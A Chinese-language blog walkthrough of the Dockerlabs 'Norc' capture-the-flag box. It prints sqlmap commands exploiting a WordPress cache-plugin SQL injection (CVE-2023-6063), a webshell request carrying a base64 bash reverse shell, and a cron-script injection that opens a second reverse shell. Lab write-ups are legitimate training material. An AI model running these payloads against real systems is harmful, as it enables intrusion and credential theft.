Dockerlabs-Norc

Box Info

OSLinux
DifficultyHard

Nmap

[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV  -A                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 21:13 CST
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:5c:7b:fe:79:92:7a:f9:85:ec:a5:b9:27:25:db:85 (ECDSA)
|_  256 ba:69:95:e3:df:7e:42:ec:69:ed:74:9e:6b:f6:9a:06 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Did not follow redirect to http://norc.labs/?password-protected=login&redirect_to=http%3A%2F%2F172.17.0.2%2F
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.11 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds

norc.labs添加到/etc/hosts

在抓包的时候发现似乎存在wordpress服务,可以看到Cookie的样式

访问/wp-admin的时候自动就跳转到了登录页面

使用WPscan并没有任何效果

FFUF

[root@kali] /home/kali/Desktop  
❯ ffuf -u "http://norc.labs/FUZZ" -w ./Wordpress-BruteForce-List/WPfuzz.txt -mc 200 -o result.txt

然后查看是否使用了插件

[root@kali] /home/kali/Desktop  
❯ cat result.txt | jq | grep -n "plugin"
1196:        "FUZZ": "wp-admin/includes/plugin-install.php"
1208:      "url": "http://norc.labs/wp-admin/includes/plugin-install.php",
1232:        "FUZZ": "wp-admin/includes/plugin.php"
1244:      "url": "http://norc.labs/wp-admin/includes/plugin.php",
1664:        "FUZZ": "wp-admin/js/plugin-install.js"
1676:      "url": "http://norc.labs/wp-admin/js/plugin-install.js",
3266:        "FUZZ": "/wp-content/plugins/wp-fastest-cache/readme.txt"
3278:      "url": "http://norc.labs//wp-content/plugins/wp-fastest-cache/readme.txt",

CVE-2023-6063

关注到wp-fastest-cache的版本号是1.2.1

搜索到了一个SQL注入的漏洞

[root@kali] /home/kali/Desktop  
❯ sqlmap --dbms=mysql -u "http://norc.labs/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema    

可以看到存在时间盲注漏洞

[root@kali] /home/kali/Desktop  
❯ sqlmap --dbms=mysql -u "http://norc.labs/wp-login.php" --cookie='wordpress_logged_in=*' --level=3 -D wordpress -T wp_users -C user_login,user_pass,user_email --dump

但是无法进行破解,不过得到一个子域名oledockers,进入后得到了密码

www-data

采用Dockerlabs-WalkingCMS – HYH里的方式制作插件

安装后访问,POST传参执行命令

http://norc.labs/wp-content/plugins/health-check/webshell.php

#POST
cmd=echo%20%22YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS8xMDAgMD4mMQ==%22%7Cbase64%20-d%7Cbash

User

kvzlx的目录中发现一个脚本,但是其中的.wp-encrypted.txt并没有在目录中发现,/tmp/decoded.txt也是空的

www-data@955ef139e3e6:/home/kvzlx$ ls -al
ls -al
total 24
drwxr-xr-x 1 kvzlx kvzlx 4096 Jul  1  2024 .
drwxr-xr-x 1 root  root  4096 Jul  1  2024 ..
-rw-r--r-- 1 kvzlx kvzlx  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 kvzlx kvzlx 3526 Apr 23  2023 .bashrc
-rwxr--r-- 1 kvzlx kvzlx  164 Jun  9  2024 .cron_script.sh
-rw-r--r-- 1 kvzlx kvzlx  807 Apr 23  2023 .profile
www-data@955ef139e3e6:/home/kvzlx$ cat .cron*
cat .cron*
#!/bin/bash
ENC_PASS=$(cat /var/www/html/.wp-encrypted.txt)
DECODED_PASS=$(echo $ENC_PASS | base64 -d)

echo $DECODED_PASS > /tmp/decoded.txt

eval "$DECODED_PASS"

上传一下pspy跟踪进程

可以发现UID1000的用户在运行这个脚本,也就是kvzlx本人

www-data@955ef139e3e6:/var/www$ getent passwd 1000
getent passwd 1000
kvzlx:x:1000:1000::/home/kvzlx:/bin/bash

因此可以写入进行.wp-encrypted.txt提权,因为.cron_script.sh无法写入

www-data@955ef139e3e6:/var/www/html$ echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzIwMCAwPiYx" >> .wp-encrypted.txt

监听得到kvzlx的反弹shell

Root

linpeas输出中发现,/opt/python3可以修改uid

查找GTFOBins👇

Summary

User:扫描得到wordpress缓存插件存在SQL时间盲注漏洞,得到子域名后拿到密码,登录后台从而写入木马反弹Shell。这里可以上传pspy来追踪进程发现存在用户的定时任务,根据脚本写入反弹语句。

Rootpython可以设置当前用户的uid,可以设置为root权限启动/bin/sh

当前页面链接: https://www.hyhforever.top/dockerlabs-norc/
如果您对本文内容有所意见或者建议,欢迎评论。
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇